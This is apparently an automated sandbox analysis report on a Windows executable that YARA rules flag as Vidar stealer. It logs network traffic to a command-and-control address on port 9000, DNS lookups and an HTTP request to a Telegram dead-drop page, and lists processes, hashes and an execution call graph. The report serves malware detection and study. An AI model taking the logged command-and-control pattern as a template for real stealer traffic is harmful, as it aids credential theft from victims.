                                                  Jul 1, 2024 09:12:43.384854078 CEST900049745195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:43.384862900 CEST900049745195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:43.384871960 CEST900049745195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:43.384881020 CEST900049745195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:43.396625996 CEST900049747195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.047657967 CEST900049747195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.047768116 CEST497479000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.048083067 CEST497479000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.049690962 CEST497479000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.049726009 CEST497479000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.053004026 CEST900049747195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.054773092 CEST900049747195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.054879904 CEST900049747195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.054893970 CEST900049747195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.140815973 CEST900049745195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.140935898 CEST497459000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.239037991 CEST497459000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.239428997 CEST497499000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.244343042 CEST900049749195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.244420052 CEST497499000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.244520903 CEST900049745195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.244570971 CEST497459000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.244669914 CEST497499000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.252818108 CEST900049749195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.760189056 CEST900049747195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.760268927 CEST497479000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.918219090 CEST900049749195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.918338060 CEST497499000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.918709040 CEST497499000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.920514107 CEST497499000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.923659086 CEST900049749195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.925400972 CEST900049749195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:45.327114105 CEST497479000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:45.327506065 CEST497519000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:45.332350016 CEST900049747195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:45.332369089 CEST900049751195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:45.332401991 CEST497479000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:45.332454920 CEST497519000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:45.332719088 CEST497519000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:45.337485075 CEST900049751195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:45.744729042 CEST900049749195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:45.744935036 CEST497499000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:45.987560987 CEST900049751195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:45.987624884 CEST497519000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:45.988691092 CEST497519000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:45.991328955 CEST497519000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:45.993448019 CEST900049751195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:45.996088982 CEST900049751195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:46.367798090 CEST497499000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:46.368263960 CEST497529000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:46.373220921 CEST900049749195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:46.373238087 CEST900049752195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:46.373284101 CEST497499000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:46.373322964 CEST497529000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:46.373573065 CEST497529000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:46.378309011 CEST900049752195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:46.836754084 CEST900049751195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:46.837467909 CEST497519000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.029063940 CEST900049752195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:47.029134989 CEST497529000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.029573917 CEST497529000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.031255960 CEST497529000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.033107042 CEST497539000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.035072088 CEST900049752195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:47.036894083 CEST900049752195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:47.036948919 CEST497529000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.038252115 CEST900049753195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:47.039406061 CEST497539000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.039642096 CEST497539000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.044492006 CEST900049753195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:47.693741083 CEST900049753195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:47.693805933 CEST497539000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.694147110 CEST497539000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.695693970 CEST497539000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.697083950 CEST497549000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.699074984 CEST900049753195.201.251.214192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 1, 2024 09:12:21.091492891 CEST | 57532 | 53 | 192.168.2.4 | 1.1.1.1
Jul 1, 2024 09:12:22.091768026 CEST | 57532 | 53 | 192.168.2.4 | 1.1.1.1
Jul 1, 2024 09:12:23.097721100 CEST | 57532 | 53 | 192.168.2.4 | 1.1.1.1
Jul 1, 2024 09:12:25.113420010 CEST | 57532 | 53 | 192.168.2.4 | 1.1.1.1
Jul 1, 2024 09:12:29.131639004 CEST | 57532 | 53 | 192.168.2.4 | 1.1.1.1
Jul 1, 2024 09:12:29.281085968 CEST | 53 | 57532 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 1, 2024 09:12:21.091492891 CEST | 192.168.2.4 | 1.1.1.1 | 0x44a0 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Jul 1, 2024 09:12:22.091768026 CEST | 192.168.2.4 | 1.1.1.1 | 0x44a0 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Jul 1, 2024 09:12:23.097721100 CEST | 192.168.2.4 | 1.1.1.1 | 0x44a0 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Jul 1, 2024 09:12:25.113420010 CEST | 192.168.2.4 | 1.1.1.1 | 0x44a0 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Jul 1, 2024 09:12:29.131639004 CEST | 192.168.2.4 | 1.1.1.1 | 0x44a0 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 1, 2024 09:12:28.937510014 CEST | 1.1.1.1 | 192.168.2.4 | 0xadcc | No error (0) | windowsupdatebg.s.llnwi.net | | 87.248.205.0 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 09:12:29.281085968 CEST | 1.1.1.1 | 192.168.2.4 | 0x44a0 | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 09:13:30.909853935 CEST | 1.1.1.1 | 192.168.2.4 | 0xb1eb | No error (0) | windowsupdatebg.s.llnwi.net | | 87.248.205.0 | A (IP address) | IN (0x0001) | false
                                                  • t.me
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49729 | 149.154.167.99 | 443 | 7768 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp: 2024-07-01 07:12:30 UTC, Bytes transferred: 84, Direction: OUT, Data:
GET /g067n HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache

Timestamp: 2024-07-01 07:12:30 UTC, Bytes transferred: 511, Direction: IN, Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 01 Jul 2024 07:12:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12310
Connection: close
Set-Cookie: stel_ssid=978a8cba9b70c038b8_6505044929390746476; expires=Tue, 02 Jul 2024 07:12:30 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000

Timestamp: 2024-07-01 07:12:30 UTC, Bytes transferred: 12310, Direction: IN, Data:
Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @g067n</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent.



                                                  Target ID:0
                                                  Start time:03:12:17
                                                  Start date:01/07/2024
                                                  Path:C:\Users\user\Desktop\56bDgH9sMQ.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\56bDgH9sMQ.exe"
                                                  Imagebase:0xc60000
                                                  File size:430'592 bytes
                                                  MD5 hash:F88272EA7674D3ACEDD8ADCF7643C598
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:03:12:17
                                                  Start date:01/07/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                  Imagebase:0x190000
                                                  File size:65'440 bytes
                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:03:12:17
                                                  Start date:01/07/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                  Imagebase:0x7b0000
                                                  File size:65'440 bytes
                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: HiddenCobra_BANKSHOT_Gen, Description: Detects Hidden Cobra BANKSHOT trojan, Source: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:5
                                                  Start time:03:12:17
                                                  Start date:01/07/2024
                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7736 -s 324
                                                  Imagebase:0x5c0000
                                                  File size:483'680 bytes
                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true


                                                    Execution Graph

                                                    Execution Coverage:2.3%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:2.1%
                                                    Total number of Nodes:1425
                                                    Total number of Limit Nodes:22
19172->19174 19173->19137 19173->19138 19174->19173 19175 c76730 __Getctype 41 API calls 19174->19175 19176 c7300c 19175->19176 19180 c775ca 19176->19180 19181 c73022 19180->19181 19182 c775dd 19180->19182 19184 c77628 19181->19184 19182->19181 19188 c7f73f 19182->19188 19185 c7763b 19184->19185 19187 c77650 19184->19187 19185->19187 19209 c7de22 19185->19209 19187->19173 19189 c7f74b ___scrt_is_nonwritable_in_current_image 19188->19189 19190 c76730 __Getctype 41 API calls 19189->19190 19191 c7f754 19190->19191 19198 c7f79a 19191->19198 19201 c70829 EnterCriticalSection 19191->19201 19193 c7f772 19202 c7f7c0 19193->19202 19198->19181 19199 c7089f CallUnexpected 41 API calls 19200 c7f7bf 19199->19200 19201->19193 19203 c7f783 19202->19203 19204 c7f7ce __Getctype 19202->19204 19206 c7f79f 19203->19206 19204->19203 19205 c7f4f3 __Getctype 14 API calls 19204->19205 19205->19203 19207 c70871 std::_Lockit::~_Lockit LeaveCriticalSection 19206->19207 19208 c7f796 19207->19208 19208->19198 19208->19199 19210 c76730 __Getctype 41 API calls 19209->19210 19211 c7de27 19210->19211 19212 c7dd3a __strnicoll 41 API calls 19211->19212 19213 c7de32 19212->19213 19213->19187 19215 c7da61 GetCPInfo 19214->19215 19224 c7db2a 19214->19224 19220 c7da79 19215->19220 19215->19224 19217 c692b4 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 19219 c7dbe3 19217->19219 19219->19156 19225 c79fba 19220->19225 19223 c7a2b1 45 API calls 19223->19224 19224->19217 19226 c72fcd __strnicoll 41 API calls 19225->19226 19227 c79fda 19226->19227 19245 c7ccae 19227->19245 19229 c7a09e 19232 c692b4 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 19229->19232 19230 c7a096 19248 c68e40 19230->19248 19231 c7a007 19231->19229 19231->19230 19234 c77686 __fread_nolock 15 API calls 19231->19234 19236 c7a02c __fread_nolock __alloca_probe_16 19231->19236 19235 c7a0c1 19232->19235 19234->19236 19240 c7a2b1 
19235->19240 19236->19230 19237 c7ccae __fread_nolock MultiByteToWideChar 19236->19237 19238 c7a077 19237->19238 19238->19230 19239 c7a082 GetStringTypeW 19238->19239 19239->19230 19241 c72fcd __strnicoll 41 API calls 19240->19241 19242 c7a2c4 19241->19242 19255 c7a0c3 19242->19255 19246 c7ccbf MultiByteToWideChar 19245->19246 19246->19231 19249 c68e4a 19248->19249 19251 c68e5b 19248->19251 19249->19251 19252 c6dbe5 19249->19252 19251->19229 19253 c7745c ___free_lconv_mon 14 API calls 19252->19253 19254 c6dbfd 19253->19254 19254->19251 19256 c7a0de 19255->19256 19257 c7ccae __fread_nolock MultiByteToWideChar 19256->19257 19261 c7a124 19257->19261 19258 c7a29c 19259 c692b4 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 19258->19259 19260 c7a2af 19259->19260 19260->19223 19261->19258 19262 c77686 __fread_nolock 15 API calls 19261->19262 19264 c7a14a __alloca_probe_16 19261->19264 19272 c7a1d0 19261->19272 19262->19264 19263 c68e40 __freea 14 API calls 19263->19258 19265 c7ccae __fread_nolock MultiByteToWideChar 19264->19265 19264->19272 19266 c7a18f 19265->19266 19266->19272 19283 c78f2f 19266->19283 19269 c7a1c1 19269->19272 19275 c78f2f std::_Locinfo::_Locinfo_ctor 6 API calls 19269->19275 19270 c7a1f9 19271 c7a284 19270->19271 19273 c77686 __fread_nolock 15 API calls 19270->19273 19276 c7a20b __alloca_probe_16 19270->19276 19274 c68e40 __freea 14 API calls 19271->19274 19272->19263 19273->19276 19274->19272 19275->19272 19276->19271 19277 c78f2f std::_Locinfo::_Locinfo_ctor 6 API calls 19276->19277 19278 c7a24e 19277->19278 19278->19271 19289 c7cd2a 19278->19289 19280 c7a268 19280->19271 19281 c7a271 19280->19281 19282 c68e40 __freea 14 API calls 19281->19282 19282->19272 19284 c78a21 std::_Lockit::_Lockit 5 API calls 19283->19284 19285 c78f3a 19284->19285 19286 c78f40 19285->19286 19287 c78f8c std::_Locinfo::_Locinfo_ctor 5 API calls 19285->19287 19286->19269 19286->19270 19286->19272 19288 c78f80 LCMapStringW 
19287->19288 19288->19286 19291 c7cd41 WideCharToMultiByte 19289->19291 19291->19280 19292->19162 19303 c71ebd 19293->19303 19295 c7d8c6 19296 c71ebd __fread_nolock 41 API calls 19295->19296 19297 c7d8e5 19296->19297 19298 c7d87a 19297->19298 19299 c7745c ___free_lconv_mon 14 API calls 19297->19299 19300 c7d898 19298->19300 19299->19298 19317 c70871 LeaveCriticalSection 19300->19317 19302 c7d886 19302->18811 19304 c71ece 19303->19304 19311 c71eca codecvt 19303->19311 19305 c71ed5 19304->19305 19308 c71ee8 __fread_nolock 19304->19308 19306 c7127e __strnicoll 14 API calls 19305->19306 19307 c71eda 19306->19307 19309 c6da7f __strnicoll 41 API calls 19307->19309 19310 c71f16 19308->19310 19308->19311 19313 c71f1f 19308->19313 19309->19311 19312 c7127e __strnicoll 14 API calls 19310->19312 19311->19295 19314 c71f1b 19312->19314 19313->19311 19315 c7127e __strnicoll 14 API calls 19313->19315 19316 c6da7f __strnicoll 41 API calls 19314->19316 19315->19314 19316->19311 19317->19302 19319 c762e7 19318->19319 19320 c762f5 19318->19320 19319->19320 19325 c7630d 19319->19325 19321 c7127e __strnicoll 14 API calls 19320->19321 19322 c762fd 19321->19322 19323 c6da7f __strnicoll 41 API calls 19322->19323 19324 c76307 19323->19324 19324->18759 19325->19324 19326 c7127e __strnicoll 14 API calls 19325->19326 19326->19322 19328 c74096 19327->19328 19332 c74067 19327->19332 19329 c740ad 19328->19329 19330 c7745c ___free_lconv_mon 14 API calls 19328->19330 19331 c7745c ___free_lconv_mon 14 API calls 19329->19331 19330->19328 19331->19332 19332->18760 19334 c6dab8 19333->19334 19335 c6d883 CallUnexpected 8 API calls 19334->19335 19336 c6dacd GetCurrentProcess TerminateProcess 19335->19336 19336->18766 19338 c61466 19337->19338 19338->19338 19418 c62ec0 19338->19418 19340 c614b8 19341 c62420 72 API calls 19340->19341 19348 c614bd std::ios_base::_Ios_base_dtor 19340->19348 19341->19348 19342 c616be std::ios_base::_Init 19427 c62dd0 19342->19427 19343 c61685 19344 c61698 19343->19344 19423 
c63b00 19343->19423 19351 c62420 19344->19351 19348->19342 19348->19343 19350 c616fe 19572 c6599b 19351->19572 19354 c6599b std::_Lockit::_Lockit 7 API calls 19356 c62454 19354->19356 19355 c62475 19360 c624c5 19355->19360 19361 c624da 19355->19361 19371 c625e0 19355->19371 19578 c659f3 19356->19578 19357 c659f3 std::_Lockit::~_Lockit 2 API calls 19358 c625f9 19357->19358 19358->18576 19362 c659f3 std::_Lockit::~_Lockit 2 API calls 19360->19362 19363 c69271 codecvt 16 API calls 19361->19363 19364 c624d0 19362->19364 19367 c624e1 19363->19367 19364->18576 19365 c6259e 19366 c625da 19365->19366 19616 c62fe0 19365->19616 19631 c65f18 19366->19631 19367->19365 19370 c6599b std::_Lockit::_Lockit 7 API calls 19367->19370 19372 c62518 19370->19372 19371->19357 19373 c62603 19372->19373 19374 c6256b 19372->19374 19634 c65b7a 19373->19634 19585 c66048 19374->19585 19383 c62ec0 43 API calls 19382->19383 19384 c6563e 19383->19384 19386 c656d0 19384->19386 19387 c6570b std::ios_base::_Init 19384->19387 19385 c656e3 19393 c64fb0 19385->19393 19386->19385 19388 c63b00 43 API calls 19386->19388 19389 c62dd0 std::ios_base::_Init 43 API calls 19387->19389 19388->19385 19390 c6573d 19389->19390 19391 c69ea0 CallUnexpected RaiseException 19390->19391 19392 c6574b 19391->19392 19394 c64ff1 19393->19394 19395 c65083 19393->19395 19396 c62ec0 43 API calls 19394->19396 19405 c69271 19395->19405 19397 c64ffa 19396->19397 19398 c65072 19397->19398 19399 c650ac std::ios_base::_Init 19397->19399 19398->19395 19400 c63b00 43 API calls 19398->19400 19401 c62dd0 std::ios_base::_Init 43 API calls 19399->19401 19400->19395 19402 c650de 19401->19402 19403 c69ea0 CallUnexpected RaiseException 19402->19403 19404 c650ec 19403->19404 19407 c69276 19405->19407 19406 c708e3 _Yarn 15 API calls 19406->19407 19407->19406 19408 c69290 19407->19408 19409 c75d72 codecvt 2 API calls 19407->19409 19410 c69292 codecvt 19407->19410 19408->18582 19409->19407 19411 c69ea0 CallUnexpected RaiseException 19410->19411 
19412 c69bc1 19411->19412 19923 c61200 19413->19923 19417 c875a8 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 19417->18581 19420 c62ed7 19418->19420 19419 c62eeb 19419->19340 19420->19419 19421 c64fb0 43 API calls 19420->19421 19422 c62f07 19421->19422 19422->19340 19424 c63b63 19423->19424 19425 c63b3e 19423->19425 19424->19344 19425->19424 19444 c65790 19425->19444 19428 c62e10 19427->19428 19428->19428 19455 c617d0 19428->19455 19430 c62e24 19463 c62a00 19430->19463 19432 c62e5a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 19433 c692b4 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 19432->19433 19435 c616f0 19433->19435 19434 c62e32 19434->19432 19436 c62e81 19434->19436 19441 c69ea0 19435->19441 19483 c6da8f 19436->19483 19442 c69ee7 RaiseException 19441->19442 19443 c69eba 19441->19443 19442->19350 19443->19442 19447 c63fa0 19444->19447 19446 c657ae 19446->19424 19448 c63fb4 19447->19448 19448->19446 19449 c69ea0 CallUnexpected RaiseException 19448->19449 19450 c63fcc std::ios_base::_Init 19448->19450 19449->19450 19451 c62dd0 std::ios_base::_Init 43 API calls 19450->19451 19452 c64003 19451->19452 19453 c69ea0 CallUnexpected RaiseException 19452->19453 19454 c64012 19453->19454 19456 c61859 19455->19456 19459 c617e0 19455->19459 19509 c63cb0 19456->19509 19460 c617e5 codecvt 19459->19460 19488 c61770 19459->19488 19460->19430 19462 c61833 codecvt 19462->19430 19464 c62a28 19463->19464 19465 c62be5 19464->19465 19468 c62a39 19464->19468 19466 c63cb0 std::_Throw_Cpp_error 43 API calls 19465->19466 19467 c62bea 19466->19467 19469 c6da8f std::_Throw_Cpp_error 41 API calls 19467->19469 19471 c61770 std::_Throw_Cpp_error 43 API calls 19468->19471 19478 c62a3e codecvt 19468->19478 19470 c62bef 19469->19470 19472 c6da8f std::_Throw_Cpp_error 41 API calls 19470->19472 19471->19478 19473 c62bf4 19472->19473 19474 c69e1e std::invalid_argument::invalid_argument 42 API calls 19473->19474 19477 c62c22 19474->19477 19475 c62b2a 
std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 19476 c69e1e std::invalid_argument::invalid_argument 42 API calls 19475->19476 19479 c62b7f 19476->19479 19477->19434 19478->19467 19478->19475 19479->19470 19480 c62bb0 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 19479->19480 19481 c692b4 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 19480->19481 19482 c62bdf 19481->19482 19482->19434 19484 c6d9cb __strnicoll 41 API calls 19483->19484 19485 c6da9e 19484->19485 19486 c6daac __Getctype 11 API calls 19485->19486 19487 c6daab 19486->19487 19489 c617a3 19488->19489 19490 c61780 19488->19490 19493 c617b4 19489->19493 19494 c69271 codecvt 16 API calls 19489->19494 19491 c61787 19490->19491 19492 c617ba 19490->19492 19496 c69271 codecvt 16 API calls 19491->19496 19540 c63c70 19492->19540 19493->19462 19497 c617ad 19494->19497 19498 c6178d 19496->19498 19497->19462 19499 c6da8f std::_Throw_Cpp_error 41 API calls 19498->19499 19500 c61796 19498->19500 19501 c617c4 19499->19501 19500->19462 19502 c61859 19501->19502 19506 c617e0 19501->19506 19504 c63cb0 std::_Throw_Cpp_error 43 API calls 19502->19504 19503 c617e5 codecvt 19503->19462 19505 c6185e 19504->19505 19506->19503 19507 c61770 std::_Throw_Cpp_error 43 API calls 19506->19507 19508 c61833 codecvt 19507->19508 19508->19462 19544 c65b3a 19509->19544 19541 c63c7b codecvt 19540->19541 19542 c69ea0 CallUnexpected RaiseException 19541->19542 19543 c63c8a 19542->19543 19549 c65a5d 19544->19549 19547 c69ea0 CallUnexpected RaiseException 19548 c65b59 19547->19548 19552 c62d40 19549->19552 19555 c69e1e 19552->19555 19556 c69e2b 19555->19556 19562 c62d6e 19555->19562 19556->19562 19563 c708e3 19556->19563 19559 c69e58 19561 c6dbe5 std::locale::_Locimp::~_Locimp 14 API calls 19559->19561 19560 c762d9 std::invalid_argument::invalid_argument 41 API calls 19560->19559 19561->19562 19562->19547 19564 c77686 19563->19564 19565 c776c4 19564->19565 19567 c776af HeapAlloc 19564->19567 19570 c77698 
__strnicoll 19564->19570 19566 c7127e __strnicoll 14 API calls 19565->19566 19569 c69e48 19566->19569 19568 c776c2 19567->19568 19567->19570 19568->19569 19569->19559 19569->19560 19570->19565 19570->19567 19571 c75d72 codecvt EnterCriticalSection LeaveCriticalSection 19570->19571 19571->19570 19573 c659aa 19572->19573 19575 c659b1 19572->19575 19639 c70888 19573->19639 19576 c6243a 19575->19576 19644 c68b76 EnterCriticalSection 19575->19644 19576->19354 19576->19355 19579 c70896 19578->19579 19580 c659fd 19578->19580 19697 c70871 LeaveCriticalSection 19579->19697 19584 c65a10 19580->19584 19696 c68b84 LeaveCriticalSection 19580->19696 19583 c7089d 19583->19355 19584->19355 19698 c70b43 19585->19698 19589 c6606c 19590 c70b43 std::_Locinfo::_Locinfo_ctor 68 API calls 19589->19590 19591 c6607c 19589->19591 19590->19591 19592 c65ea2 _Yarn 15 API calls 19591->19592 19593 c62576 19592->19593 19594 c6615d 19593->19594 19878 c70cb4 19594->19878 19596 c66166 __Getctype 19597 c66180 19596->19597 19598 c6619e 19596->19598 19883 c70b7b 19597->19883 19600 c70b7b __Getctype 41 API calls 19598->19600 19601 c66187 19600->19601 19888 c70cd9 19601->19888 19604 c6258d 19606 c662d4 19604->19606 19607 c662e7 __fread_nolock 19606->19607 19608 c70cb4 __Getctype 41 API calls 19607->19608 19609 c662ef 19608->19609 19911 c70d00 19609->19911 19612 c70cd9 __Getctype 41 API calls 19613 c662fe 19612->19613 19614 c70b7b __Getctype 41 API calls 19613->19614 19615 c66315 19613->19615 19614->19615 19615->19365 19916 c66093 19616->19916 19619 c62ff9 19621 c63010 19619->19621 19623 c6dbe5 std::locale::_Locimp::~_Locimp 14 API calls 19619->19623 19620 c6dbe5 std::locale::_Locimp::~_Locimp 14 API calls 19620->19619 19622 c63027 19621->19622 19624 c6dbe5 std::locale::_Locimp::~_Locimp 14 API calls 19621->19624 19625 c6303e 19622->19625 19626 c6dbe5 std::locale::_Locimp::~_Locimp 14 API calls 19622->19626 19623->19621 19624->19622 19627 c63055 19625->19627 19628 c6dbe5 std::locale::_Locimp::~_Locimp 14 
API calls 19625->19628 19626->19625 19629 c6306c 19627->19629 19630 c6dbe5 std::locale::_Locimp::~_Locimp 14 API calls 19627->19630 19628->19627 19630->19629 19632 c69271 codecvt 16 API calls 19631->19632 19633 c65f23 19632->19633 19633->19371 19920 c65ad1 19634->19920 19637 c69ea0 CallUnexpected RaiseException 19638 c65b99 19637->19638 19645 c79031 19639->19645 19644->19576 19666 c78937 19645->19666 19665 c79063 19665->19665 19667 c78b20 std::_Lockit::_Lockit 5 API calls 19666->19667 19668 c7894d 19667->19668 19669 c78951 19668->19669 19670 c78b20 std::_Lockit::_Lockit 5 API calls 19669->19670 19671 c78967 19670->19671 19672 c7896b 19671->19672 19673 c78b20 std::_Lockit::_Lockit 5 API calls 19672->19673 19674 c78981 19673->19674 19675 c78985 19674->19675 19676 c78b20 std::_Lockit::_Lockit 5 API calls 19675->19676 19677 c7899b 19676->19677 19678 c7899f 19677->19678 19679 c78b20 std::_Lockit::_Lockit 5 API calls 19678->19679 19680 c789b5 19679->19680 19681 c789b9 19680->19681 19682 c78b20 std::_Lockit::_Lockit 5 API calls 19681->19682 19683 c789cf 19682->19683 19684 c789d3 19683->19684 